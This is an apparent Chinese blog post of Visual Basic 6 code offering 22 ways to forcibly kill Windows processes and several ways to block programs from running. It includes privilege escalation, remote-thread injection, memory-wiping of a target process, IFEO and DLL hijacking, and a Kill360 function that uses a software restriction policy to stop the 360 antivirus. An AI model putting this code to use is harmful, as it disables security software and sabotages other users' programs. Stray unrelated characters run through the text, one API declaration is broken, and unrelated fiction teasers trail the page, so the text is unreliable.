殺進(jìn)程方法大全

Windows下殺進(jìn)程22種方法:

'1.結(jié)束進(jìn)程 (參數(shù):進(jìn)程ID)

Sub KillProcess(ByVal dwProcessId As Long)

        SetDebug '提權(quán)

        Dim hProcess As Long

        '方法1袖瞻,使用普通API

        hProcess = OpenProcess(PROCESS_TERMINATE,False, dwProcessId)

        If hProcess <> 0 Then

               TerminateProcess hProcess, 0&

               CloseHandle hProcess

        End If

        '方法2,使用內(nèi)核API

        Dimoa          As OBJECT_ATTRIBUTES

        Dimcid         As CLIENT_ID

        Dim ntStatus    AsLong

        oa.Length = Len(oa)

        cid.UniqueProcess = dwProcessId

        ntStatus = ZwOpenProcess(hProcess,PROCESS_TERMINATE, oa, cid)

        If ntStatus >= 0 Then

               ZwTerminateProcess hProcess, 0&

               ZwClose hProcess

        End If

        '方法3

        'dwProcessId = dwProcessId + 1

End Sub

 

'2.結(jié)束線程 (參數(shù):線程ID)

SubKillThread(ByVal dwThreadId As Long)

        SetDebug '提權(quán)

        Dim hThread As Long

        '方法1,使用普通API

        hThread =OpenThread(THREAD_TERMINATE, False, dwThreadId)

        If hThread <> 0 Then

               TerminateThread hThread, 0&

               CloseHandle hThread

        End If

         '方法2撤嫩,使用內(nèi)核API

        Dimoa          As OBJECT_ATTRIBUTES

        Dimcid         As CLIENT_ID

        Dim ntStatus    AsLong

        oa.Length = Len(oa)

        cid.UniqueThread = dwThreadId

        ntStatus = ZwOpenThread(hThread,THREAD_TERMINATE, oa, cid)

        If ntStatus >= 0 Then

               ZwTerminateThread hThread, 0&

               ZwClose hThread

        End If

End Sub

 

'3.結(jié)束作業(yè)對(duì)象 (參數(shù):進(jìn)程ID)

PublicFunction KillJob(ByVal dwProcessId As Long) As Boolean

        Dim hProcess    AsLong

        DimhJob        As Long

        Dim ntStatus    AsLong

        Dimoa          As OBJECT_ATTRIBUTES

        oa.Length = Len(oa)

        ntStatus = ZwCreateJobObject(ByValVarPtr(hJob), JOB_OBJECT_ALL_ACCESS, oa)

        If ntStatus >= 0 Then

               hProcess = OpenProcess(PROCESS_ALL_ACCESS, False, dwProcessId)

               If hProcess <> 0 Then

                       ntStatus = ZwAssignProcessToJobObject(hJob, hProcess)

                       If (ntStatus >= 0) Then

                               KillJob = ZwTerminateJobObject(hJob, 0&) >= 0

                       End If

                       ZwClose hProcess

               End If

               ZwClose hJob

        End If

End Function

 

'4.注入退出進(jìn)程

PublicFunction MyExitProcess(ByVal dwProcessId As Long) As Boolean

        Dim hProcess As Long, hThread AsLong, lngRet As Long, pThread As Long

        hProcess = OpenProcess(PROCESS_ALL_ACCESS,False, dwProcessId)

        If hProcess <> 0 Then

               pThread = GetProcAddress(GetModuleHandleA("kernel32"),"ExitProcess")

               hThread = CreateRemoteThread(hProcess, ByVal 0&, 0&, ByVal pThread,ByVal 0&, 0, 0&)

               If hThread <> 0 Then

                       WaitForSingleObject hThread, INFINITE

                       GetExitCodeThread hThread, lngRet

                       MyExitProcess = lngRet

                       ZwClose hThread

               End If

               ZwClose hProcess

        End If

End Function

 

'5.破壞進(jìn)程內(nèi)存

SubClearProcessMemory(ByVal dwProcessId As Long)

        hProcess =OpenProcess(PROCESS_ALL_ACCESS, False, dwProcessId)

        If hProcess Then

               Dim i  As Long

               Dim dwWritten       As Long

               Dim bytArray()      As Byte

               ReDim bytArray(0 To 4095)

               For i = &H10000 To &H7FFFFFFF - &H10000 Step &H1000

                       Call WriteProcessMemory(hProcess, ByVal i, VarPtr(bytArray(0)), &H1000,dwWritten)

               Next

               Erase bytArray

               ZwClose hProcess

        End If

End Sub

 

'6.結(jié)束任務(wù) (參數(shù):窗口句柄)

SubKillTask(ByVal m_hWnd As Long)

        EndTask m_hWnd, False, True

End Sub

 

'7.停止服務(wù) (參數(shù):服務(wù)名稱)

PublicFunction StopSvc(strServiceName As String) As Boolean

        Dim scHandle    AsLong

        Dim svcHandle   As Long

        scHandle =OpenSCManager(vbNullString, vbNullString, SC_MANAGER_ENUMERATE_SERVICE)

        svcHandle = OpenService(scHandle,strServiceName, SERVICE_WIN32_SHARE_PROCESS)

        StopSvc = ControlService(svcHandle,SERVICE_CONTROL_STOP, 0&)

        CloseServiceHandle (svcHandle)

        CloseServiceHandle (scHandle)

End Function

 

'8.WM_CLOSE 關(guān)閉窗口 (參數(shù):窗口句柄)

SubCloseWnd(ByVal m_hWnd As Long)

        PostMessage m_hWnd, WM_CLOSE, 0, 0

End Sub

 

'9.WM_SYSCOMMAND  (發(fā)送系統(tǒng)菜單命令)

SubCloseWnd_SysCommand(ByVal m_hWnd As Long)

        PostMessage m_hWnd, WM_SYSCOMMAND,SC_CLOSE, 0

End Sub

 

'10.WM_NCLBUTTONDBLCLK  (點(diǎn)擊系統(tǒng)菜單)

SubCloseWnd_NCLDBK(ByVal m_hWnd As Long)

        PostMessage m_hWnd,WM_NCLBUTTONDBLCLK, HTSYSMENU, 0

End Sub

 

'11.發(fā)送Alt+F4

SubSendAltF4(ByVal m_hWnd As Long)

        SetForegroundWindow m_hWnd

        DoEvents

        PostMessage m_hWnd, WM_SYSKEYDOWN,vbKeyF4, &H203E0001

        PostMessage m_hWnd, WM_SYSKEYUP,vbKeyF4, &H203E0001

End Sub

 

'12.模擬Alt+F4空免,對(duì)隱藏窗口也有效

SubKeyPressAltF4(ByVal m_hWnd As Long)

       SetForegroundWindow m_hWnd

        DoEvents

        '方法一

        keybd_event vbKeyMenu, 0, 0, 0

        keybd_event vbKeyF4, 0, 0, 0

        keybd_event vbKeyF4, 0,KEYEVENTF_KEYUP, 0

        keybd_event vbKeyMenu, 0,KEYEVENTF_KEYUP, 0

        '方法二

        m_SendInputAltF4

End Sub

 

'13.模擬Alt+空格+C

SubKeyPressAltSpaceC(ByVal m_hWnd As Long)

        SetForegroundWindow m_hWnd

        DoEvents

        keybd_event vbKeyMenu, 0, 0, 0

        keybd_event vbKeySpace, 0, 0, 0

        keybd_event vbKeySpace, 0,KEYEVENTF_KEYUP, 0

        keybd_event vbKeyMenu, 0,KEYEVENTF_KEYUP, 0

        keybd_event vbKeyC, 0, 0, 0

        keybd_event vbKeyC, 0,KEYEVENTF_KEYUP, 0

End Sub

 

'14.模擬單擊關(guān)閉按鈕/雙擊系統(tǒng)菜單

SubMouseClickClose(ByVal m_hWnd As Long)

        DimlStyle      As Long

        Dim CXBorder    AsLong

        Dim CYBorder    AsLong

        Dim CYCaption   As Long

        Dimx           As Long

        Dimy           As Long

        DimptOld       As POINTAPI

        DimlRect       As RECT

        Dim RTLStyle    AsBoolean

       

        '計(jì)算標(biāo)準(zhǔn)窗口非客戶區(qū)邊框

        lStyle = GetWindowLong(m_hWnd,GWL_STYLE)

        If lStyle And WS_THICKFRAME Then

               CXBorder = GetSystemMetrics(SM_CXFRAME) \ 2

               CYBorder = GetSystemMetrics(SM_CYFRAME) \ 2

        Else

               CXBorder = GetSystemMetrics(SM_CXDLGFRAME)

               CYBorder = GetSystemMetrics(SM_CYDLGFRAME)

        End If

        CYCaption = GetSystemMetrics(SM_CYCAPTION)'標(biāo)題欄高度

        lStyle = lStyle And Not WS_DISABLEDOr WS_SYSMENU Or WS_CAPTION '使之有效且擁有系統(tǒng)菜單

        Call SetWindowLong(m_hWnd,GWL_STYLE, lStyle)

        Call SetWindowPos(m_hWnd,HWND_TOPMOST, 0, 0, 0, 0, SWP_NOMOVE Or SWP_NOSIZE Or SWP_SHOWWINDOW) '設(shè)為頂層且可視

        Call GetWindowRect(m_hWnd, lRect)

        lStyle = GetWindowLong(m_hWnd,GWL_EXSTYLE)

        RTLStyle = lStyle AndWS_EX_LAYOUTRTL '是否是鏡子窗口

       

        '****************** 方法一 單擊關(guān)閉 ********************

        If Not RTLStyle Then

               x = lRect.Right - (CXBorder + CYCaption \ 2)

               y = lRect.Top + (CYBorder + CYCaption \ 2)

        Else

               x = lRect.Left + (CXBorder + CYCaption \ 2)

               y = lRect.Top + (CYBorder + CYCaption \ 2)

        End If

        Call GetCursorPos(ptOld) '原坐標(biāo)

        Call SetCursorPos(x, y)

       

        '方法(1)keybd_event

        Callmouse_event(MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0)

        Call mouse_event(MOUSEEVENTF_LEFTUP,0, 0, 0, 0)

       

        '方法(2)SendInput

        m_MouseClick

       

        Call SetCursorPos(ptOld.x,ptOld.y)  '恢復(fù)坐標(biāo)

       

        '****************** 方法二 雙擊系統(tǒng)菜單 ******************

        If RTLStyle Then

               x = lRect.Right - (CXBorder + CYCaption \ 2)

               y = lRect.Top + (CYBorder + CYCaption \ 2)

        Else

               x = lRect.Left + (CXBorder + CYCaption \ 2)

               y = lRect.Top + (CYBorder + CYCaption \ 2)

        End If

        Call GetCursorPos(ptOld) '原坐標(biāo)

        Call SetCursorPos(x, y)

       

        '方法(1)keybd_event

        Callmouse_event(MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0)

        Call mouse_event(MOUSEEVENTF_LEFTUP,0, 0, 0, 0)

        Callmouse_event(MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0)

        Call mouse_event(MOUSEEVENTF_LEFTUP,0, 0, 0, 0)

       

        '方法(2)SendInput

        Call m_MouseClick

        Call m_MouseClick

       

        Call SetCursorPos(ptOld.x,ptOld.y)  '恢復(fù)坐標(biāo)

End Sub

 

'15.銷毀窗口(WM_DESTROY/WM_NCDESTROY)

SubDestroyWnd(ByVal m_hWnd As Long)

        '方法一增炭,銷毀客戶區(qū)

        Call PostMessage(m_hWnd, WM_DESTROY,0, 0)

        '方法二踩蔚,銷毀非客戶區(qū)砚嘴,需執(zhí)行兩次

        Call PostMessage(m_hWnd,WM_NCDESTROY, 0, 0)

        Call PostMessage(m_hWnd,WM_NCDESTROY, 0, 0)

End Sub

 

'16.退出窗口

SubQuitWnd(ByVal m_hWnd As Long)

        Call PostMessage(m_hWnd, WM_QUIT, 0,0)

End Sub

 

'17.退出線程 參數(shù):線程ID或窗口句柄

SubQuitThread(ByVal m_ID As Long, Optional ByVal IshWnd As Boolean)

        If IshWnd Then m_ID =GetWindowThreadProcessId(m_ID, 0&)

        Call PostThreadMessage(m_ID,WM_QUIT, 0, 0)

End Sub

 

'18.SetParent

Sub SetParentHwnd(ByVal m_hWnd As Long)

        Dim hParent As Long

        hParent = CreateWindowEx(0,"#32770", "yuanfang235", 0, 0, 0, 0, 0, 0, 0, 0, ByVal0&) '創(chuàng)建一個(gè)臨時(shí)窗口

        If hParent <> 0 Then

               m_hWnd = GetAncestor(m_hWnd, GA_ROOT) '根窗口

               SetParent m_hWnd, hParent '將其俘虜

               DestroyWindow hParent  '自殺

        End If

End Sub

 

'19.發(fā)送垃圾消息

SubSendMsg(ByVal m_hWnd As Long)

        Dim i&

        For i = 1 To 1000

               PostMessage m_hWnd, i, 0, 0

        Next i

End Sub

 

'20.散布虛假退出系統(tǒng)消息

SubSendShutDown()

        CallSetProcessShutdownParameters(&H0&, 0&) '調(diào)整本進(jìn)程為最后退出

        ExitWindowsEx 0, 0 '注銷系統(tǒng)

       

        '在子類中吃掉WM_QUERYENDSESSION與WM_ENDSESSION檬输,從而迫使所有用戶進(jìn)程退出

End Sub

 

'21.卸載法

SubUninstallApp()

        '讀取注冊(cè)表[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*\UninstallString]下的值照瘾,獲取目標(biāo)程序的卸載程序路徑,運(yùn)行并模擬消息使其自動(dòng)卸載丧慈。

End Sub

 

'22.調(diào)試法

SubDebugProcess(ByVal dwProcessId As Long)

        DebugActiveProcess dwProcessId

        End '退出析命,和它同歸于盡,然后重新運(yùn)行或另開一實(shí)例

End Sub

'*************************************************************************

 

封進(jìn)程的幾種方法

 

'1.Shell

'路徑HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun

 

'2.IFEO

'路徑HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image FileExecution Options\*\Debugger

 

'3.manifest

'在目標(biāo)程序目錄下建一文件夾逃默,名為*.exe.Manifest 適合WinXP

 

'4.DLL劫持

'比如VB的msvbvm60.dll鹃愤,網(wǎng)絡(luò)組件ws2_32.dll等,對(duì)于打過補(bǔ)丁的系統(tǒng)無效

 

'5.權(quán)限

'適合NTFS分區(qū)完域,可借助cacls.exe命令來改變權(quán)限

 

'例子:禁止訪問記事本

Sub DisNotepad()

        Shell "cacls c:\windows\system32\notepad.exe/e /d everyone", vbHide

End Sub

 

'6.軟件限制策略

 

'//以干掉360為例软吐,之前在百度上寫過,360或許早已經(jīng)發(fā)現(xiàn)該文吟税,所以...

Public Function Kill360() As Boolean

        Dim hKey As Long

        Dim lRet As Long

        Dim strFileName As String

        Dim bytData(0 To 7) As Byte

        strFileName ="360tray.exe" '360的文件名凹耙,這里以路徑規(guī)則舉例

        lRet =RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{487462c2-2064-4e1f-aeae-20b7095a41bb}",hKey)

        If lRet = 0 Then

               lRet = RegSetValueEx(hKey, "Description", 0&, REG_SZ, ByValvbNullString, 0)

               lRet = RegSetValueEx(hKey, "ItemData", 0&, REG_SZ, ByValstrFileName, lstrlen(strFileName))

               lRet = RegSetValueEx(hKey, "LastModified", 0&, REG_QWORD,bytData(0), 8)

               lRet = RegSetValueEx(hKey, "SaferFlags", 0&, REG_DWORD, 0, 4)

               RegCloseKey hKey

               Kill360 = (lRet = 0)

        End If

End Function

 

'*********************************其它過程****************************************

'SendInput 鼠標(biāo)單擊

Private Sub m_MouseClick()

        Dim GInput(1) As PINPUT

        Dim MInput(1) As MOUSEINPUT

        GInput(0).IType = INPUT_MOUSE

        GInput(1).IType = INPUT_MOUSE

        With MInput(0)

               .dx = 0

               .dy = 0

               .dwFlags = MOUSEEVENTF_LEFTDOWN

               .time = GetMessageTime()

               .dwExtraInfo = GetMessageExtraInfo()

        End With

        With MInput(1)

               .dx = 0

               .dy = 0

               .dwFlags = MOUSEEVENTF_LEFTUP

               .time = GetMessageTime()

               .dwExtraInfo = GetMessageExtraInfo()

        End With

        CopyMemory GInput(0).ki(0),MInput(0), Len(MInput(0))

        CopyMemory GInput(1).ki(0),MInput(1), Len(MInput(1))

        SendInput 2, GInput(0),Len(GInput(0))

        Erase GInput, MInput

End Sub

 

'SendInputAlt+F4

Private Sub m_SendInputAltF4()

        Dim GInput(3) As PINPUT

        Dim KInput(3) As KEYBDINPUT

        GInput(0).IType = INPUT_KEYBOARD

        GInput(1).IType = INPUT_KEYBOARD

        GInput(2).IType = INPUT_KEYBOARD

        GInput(3).IType = INPUT_KEYBOARD

        KInput(0).wVk =vbKeyMenu       'Alt

        KInput(1).wVk =vbKeyF4         'F4

        KInput(2).wVk = vbKeyF4

        KInput(3).wVk = vbKeyMenu

        KInput(2).dwFlags = KEYEVENTF_KEYUP

        KInput(3).dwFlags = KEYEVENTF_KEYUP

        CopyMemory GInput(0).ki(0),KInput(0), Len(KInput(0))

        CopyMemory GInput(1).ki(0),KInput(1), Len(KInput(1))

        CopyMemory GInput(2).ki(0),KInput(2), Len(KInput(2))

        CopyMemory GInput(3).ki(0),KInput(3), Len(KInput(3))

        SendInput 4, GInput(0),Len(GInput(0))

        Erase GInput, KInput

        Sleep 100

        keybd_event vbKeyMenu, 0,KEYEVENTF_KEYUP, 0 '釋放Alt,(SendInput無法釋放Alt肠仪?)

End Sub

 

'提權(quán)

Private Function SetDebug() As Boolean

        SetDebug =(RtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, 1, 0, 0) >= 0)

End Function

 

'以下是API聲明:

Option Explicit

 

Private Type OBJECT_ATTRIBUTES

       Length                 As Long

       RootDirectory           AsLong

       ObjectName             As Long

       Attributes             As Long

       SecurityDescriptor      As Long

        SecurityQualityOfService As Long

End Type

 

Private Type CLIENT_ID

       UniqueProcess           AsLong

       UniqueThread           As Long

End Type

 

Private Type POINTAPI

       x              As Long

       y              As Long

End Type

 

Private Type RECT

       Left            As Long

       Top             AsLong

       Right           As Long

       Bottom          As Long

End Type

 

Private Type MOUSEINPUT

       dx             As Long

       dy             As Long

       mouseData       As Long

       dwFlags         As Long

       time            As Long

        dwExtraInfo    As Long

End Type

 

Private TypeKEYBDINPUT

        wVk As Long

        wScan As Long

        dwFlags As Long

        time As Long

        dwExtraInfo As Long

End Type

 

Private TypePINPUT

       IType           As Long

        ki(0 To 23)    As Byte

End Type

 

Private Declare Sub CopyMemory Lib "kernel32" Alias"RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long)

Private Declare Sub mouse_event Lib "user32" (ByVal dwFlags As Long,ByVal dx As Long, ByVal dy As Long, ByVal cButtons As Long, ByVal dwExtraInfoAs Long)

Private Declare Sub keybd_event Lib "user32" (ByVal bVk As Byte,ByVal bScan As Byte, ByVal dwFlags As Long, ByVal dwExtraInfo As Long)

Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds AsLong)

Private Declare Function RtlAdjustPrivilege Lib "ntdll.dll" (ByValPrivilege&, ByVal NewValue&, ByVal NewThread&, OldValue&) AsLong

Private Declare Function OpenProcess Lib "kernel32" (ByValdwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId AsLong) As Long

Private Declare Function OpenThread Lib "kernel32.dll" (ByValdwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwThreadId AsLong) As Long

Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject AsLong) As Long

Private Declare Function TerminateProcess Lib "kernel32" (ByValhProcess As Long, ByVal uExitCode As Long) As Long

Private Declare Function TerminateThread Lib "kernel32" (ByValhThread As Long, ByVal dwExitCode As Long) As Long

Private Declare Function ZwClose Lib "ntdll.dll" (ByVal ObjectHandleAs Long) As Long

Private Declare Function ZwTerminateProcess Lib "v" (ByVal hProcessAs Long, ByVal uExitCode As Long) As Long

Private Declare Function ZwTerminateThread Lib "ntdll.dll" (ByValhThread As Long, ByVal dwExitCode As Long) As Long

Private Declare Function ZwCreateJobObject Lib "ntdll.dll" (ByValhJob As Long, ByVal dwAccess As Long, oa As OBJECT_ATTRIBUTES) As Long

Private Declare Function ZwAssignProcessToJobObject Lib "ntdll.dll"(ByVal hJob As Long, ByVal hProcess As Long) As Long

Private Declare Function ZwTerminateJobObject Lib "ntdll.dll" (ByValhJob As Long, ByVal ExitStatus As Long) As Long

Private Declare Function ZwOpenProcess Lib "ntdll.dll" (ByRefProcessHandle As Long, ByVal AccessMask As Long, ByRef ObjectAttributes AsOBJECT_ATTRIBUTES, ByRef ClientID As CLIENT_ID) As Long

Private Declare Function ZwOpenThread Lib "ntdll.dll" (ByRefThreadHandle As Long, ByVal AccessMask As Long, ByRef ObjectAttributes AsOBJECT_ATTRIBUTES, ByRef ClientID As CLIENT_ID) As Long

Private Declare Function GetModuleHandleA Lib "kernel32" (ByVallpModuleName As String) As Long

Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModuleAs Long, ByVal lpProcName As String) As Long

Private Declare Function GetExitCodeThread Lib "kernel32" (ByValhThread As Long, lpExitCode As Long) As Long

Private Declare Function WaitForSingleObject Lib "kernel32" (ByValhHandle As Long, ByVal dwMilliseconds As Long) As Long

Private Declare Function CreateRemoteThread Lib "kernel32" (ByValhProcess As Long, lpThreadAttributes As Any, ByVal dwStackSize As Long,lpStartAddress As Long, lpParameter As Any, ByVal dwCreationFlags As Long,lpThreadId As Long) As Long

Private Declare Function WriteProcessMemory Lib "kernel32" (ByValhProcess As Long, lpBaseAddress As Any, lpBuffer As Long, ByVal nSize As Long,lpNumberOfBytesWritten As Long) As Long

Private Declare Function EndTask Lib "user32" (ByVal hwnd As Long,ByVal bShutDown As Boolean, ByVal bForce As Boolean) As Long

Private Declare Function OpenSCManager Lib "advapi32.dll" Alias"OpenSCManagerA" (ByVal strMachineName As String, ByVal strDBName AsString, ByVal lAccessReq As Long) As Long

Private Declare Function OpenService Lib "advapi32.dll" Alias"OpenServiceA" (ByVal hSCManager As Long, ByVal strServiceName AsString, ByVal lAccessReq As Long) As Long

Private Declare Function ControlService Lib "advapi32.dll" (ByValhService As Long, ByVal lControlCode As Long, lpServiceStatus As Long) AsBoolean

Private Declare Function CloseServiceHandle Lib "advapi32.dll" (ByValhHandle As Long) As Boolean

Private Declare Function PostMessage Lib "user32" Alias"PostMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParamAs Long, ByVal lParam As Long) As Long

Private Declare Function SetForegroundWindow Lib "user32" (ByVal hwndAs Long) As Long

Private Declare Function GetSystemMetrics Lib "user32" (ByVal nIndexAs Long) As Long

Private Declare Function GetWindowLong Lib "user32" Alias"GetWindowLongA" (ByVal hwnd As Long, ByVal nIndex As Long) As Long

Private Declare Function SetWindowLong Lib "user32" Alias"SetWindowLongA" (ByVal hwnd As Long, ByVal nIndex As Long, ByValdwNewLong As Long) As Long

Private Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long,ByVal nCmdShow As Long) As Long

Private Declare Function SetWindowPos Lib "user32" (ByVal hwnd AsLong, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal y As Long, ByVal cxAs Long, ByVal cy As Long, ByVal wFlags As Long) As Long

Private Declare Function GetCursorPos Lib "user32" (lpPoint AsPOINTAPI) As Long

Private Declare Function SetCursorPos Lib "user32" (ByVal x As Long,ByVal y As Long) As Long

Private Declare Function GetWindowRect Lib "user32" (ByVal hwnd AsLong, lpRect As RECT) As Long

Private Declare Function SendInput Lib "user32.dll" (ByVal cInputs AsLong, ByRef pInputs As PINPUT, ByVal cbSize As Long) As Long

Private Declare Function GetMessageTime Lib "user32" () As Long

Private Declare Function GetMessageExtraInfo Lib "user32" () As Long

Private Declare Function PostThreadMessage Lib "user32" Alias"PostThreadMessageA" (ByVal idThread As Long, ByVal msg As Long,ByVal wParam As Long, ByVal lParam As Long) As Long

Private Declare Function GetWindowThreadProcessId Lib "user32" (ByValhwnd As Long, lpdwProcessId As Long) As Long

Private Declare Function DestroyWindow Lib "user32" (ByVal hwnd AsLong) As Long

Private Declare Function CreateWindowEx Lib "user32" Alias"CreateWindowExA" (ByVal dwExStyle As Long, ByVal lpClassName AsString, ByVal lpWindowName As String, ByVal dwStyle As Long, ByVal x As Long,ByVal y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hWndParentAs Long, ByVal hMenu As Long, ByVal hInstance As Long, lpParam As Any) As Long

Private Declare Function SetParent Lib "user32" (ByVal hWndChild AsLong, ByVal hWndNewParent As Long) As Long

Private Declare Function GetAncestor Lib "user32.dll" (ByVal hwnd AsLong, ByVal gaFlags As Long) As Long

Private Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags AsLong, ByVal dwReserved As Long) As Long

Private Declare Function SetProcessShutdownParameters Lib "kernel32"(ByVal dwLevel As Long, ByVal dwFlags As Long) As Long

Private Declare Function DebugActiveProcess Lib "kernel32" (ByValdwProcessId As Long) As Long

 

Private Const SE_DEBUG_PRIVILEGE = 20 '調(diào)試權(quán)

Private Const PROCESS_TERMINATE = (&H1)

Private Const PROCESS_ALL_ACCESS = &H1F0FFF

Private Const PROCESS_CREATE_THREAD = (&H2)

Private Const JOB_OBJECT_ALL_ACCESS = &H1F001F

Private Const THREAD_TERMINATE = (&H1)

Private Const INFINITE = &HFFFFFFFF

 

Private Const SERVICE_CONTROL_STOP = &H1

Private Const SC_MANAGER_ENUMERATE_SERVICE = &H4

Private Const SERVICE_WIN32_SHARE_PROCESS As Long = &H20

 

Private Const WM_CLOSE = &H10

Private Const WM_SYSCOMMAND = &H112

Private Const WM_NCLBUTTONDBLCLK = &HA3

Private Const WM_KEYDOWN = &H100

Private Const WM_KEYUP = &H101

Private Const WM_SYSKEYDOWN = &H104

Private Const WM_SYSKEYUP = &H105

Private Const WM_DESTROY = &H2

Private Const WM_NCDESTROY = &H82

Private Const WM_QUIT = &H12

 

Private Const SC_CLOSE = &HF060&

Private Const HTSYSMENU = 3

 

Private Const SM_CXDLGFRAME = 7

Private Const SM_CYDLGFRAME = 8

Private Const SM_CXFRAME = 32

Private Const SM_CYFRAME = 33

Private Const SM_CYCAPTION = 4

 

Private Const GWL_STYLE = (-16)

Private Const GWL_EXSTYLE = (-20)

 

Private Const WS_CAPTION = &HC00000

Private Const WS_SYSMENU = &H80000

Private Const WS_THICKFRAME = &H40000

Private Const WS_DISABLED = &H8000000

Private Const WS_EX_LAYOUTRTL = &H400000

 

Private Const SWP_NOMOVE = &H2

Private Const SWP_NOSIZE = &H1

Private Const SWP_SHOWWINDOW = &H40

Private Const HWND_TOPMOST = -1

 

Private Const MOUSEEVENTF_LEFTDOWN = &H2

Private Const MOUSEEVENTF_LEFTUP = &H4

Private Const KEYEVENTF_KEYUP = &H2

 

Private ConstINPUT_MOUSE = 0

Private Const INPUT_KEYBOARD = 1

Private Const INPUT_HARDWARE = 2

 

Private Const GA_ROOT = 2

 

'********************* 完 *********************
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 人面猴
    序言:七十年代末肖抱,一起剝皮案震驚了整個(gè)濱河市,隨后出現(xiàn)的幾起案子藤韵,更是在濱河造成了極大的恐慌虐沥,老刑警劉巖,帶你破解...
    沈念sama閱讀 222,252評(píng)論 6 516
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異欲险,居然都是意外死亡镐依,警方通過查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 94,886評(píng)論 3 399
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進(jìn)店門天试,熙熙樓的掌柜王于貴愁眉苦臉地迎上來槐壳,“玉大人,你說我怎么就攤上這事喜每∥裉疲” “怎么了?”我有些...
    開封第一講書人閱讀 168,814評(píng)論 0 361
  • 道士緝兇錄:失蹤的賣姜人
    文/不壞的土叔 我叫張陵带兜,是天一觀的道長枫笛。 經(jīng)常有香客問我,道長刚照,這世上最難降的妖魔是什么刑巧? 我笑而不...
    開封第一講書人閱讀 59,869評(píng)論 1 299
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任,我火速辦了婚禮无畔,結(jié)果婚禮上啊楚,老公的妹妹穿的比我還像新娘。我一直安慰自己浑彰,他們只是感情好恭理,可當(dāng)我...
    茶點(diǎn)故事閱讀 68,888評(píng)論 6 398
  • 惡毒庶女頂嫁案:這布局不是一般人想出來的
    文/花漫 我一把揭開白布。 她就那樣靜靜地躺著郭变,像睡著了一般颜价。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上诉濒,一...
    開封第一講書人閱讀 52,475評(píng)論 1 312
  • 城市分裂傳說
    那天拍嵌,我揣著相機(jī)與錄音,去河邊找鬼循诉。 笑死,一個(gè)胖子當(dāng)著我的面吹牛撇他,可吹牛的內(nèi)容都是我干的茄猫。 我是一名探鬼主播,決...
    沈念sama閱讀 41,010評(píng)論 3 422
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開眼困肩,長吁一口氣:“原來是場噩夢(mèng)啊……” “哼划纽!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起锌畸,我...
    開封第一講書人閱讀 39,924評(píng)論 0 277
  • 萬榮殺人案實(shí)錄
    序言:老撾萬榮一對(duì)情侶失蹤勇劣,失蹤者是張志新(化名)和其女友劉穎,沒想到半個(gè)月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體比默,經(jīng)...
    沈念sama閱讀 46,469評(píng)論 1 319
  • ?護(hù)林員之死
    正文 獨(dú)居荒郊野嶺守林人離奇死亡幻捏,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 38,552評(píng)論 3 342
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了命咐。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片篡九。...
    茶點(diǎn)故事閱讀 40,680評(píng)論 1 353
  • 活死人
    序言:一個(gè)原本活蹦亂跳的男人離奇死亡,死狀恐怖醋奠,靈堂內(nèi)的尸體忽然破棺而出榛臼,到底是詐尸還是另有隱情,我是刑警寧澤窜司,帶...
    沈念sama閱讀 36,362評(píng)論 5 351
  • ?日本核電站爆炸內(nèi)幕
    正文 年R本政府宣布沛善,位于F島的核電站,受9級(jí)特大地震影響塞祈,放射性物質(zhì)發(fā)生泄漏金刁。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 42,037評(píng)論 3 335
  • 男人毒藥:我在死后第九天來索命
    文/蒙蒙 一织咧、第九天 我趴在偏房一處隱蔽的房頂上張望胀葱。 院中可真熱鬧,春花似錦笙蒙、人聲如沸抵屿。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,519評(píng)論 0 25
  • 一樁弒父案捅位,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽轧葛。三九已至,卻和暖如春艇搀,著一層夾襖步出監(jiān)牢的瞬間尿扯,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 33,621評(píng)論 1 274
  • 情欲美人皮
    我被黑心中介騙來泰國打工焰雕, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留衷笋,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 49,099評(píng)論 3 378
  • 代替公主和親
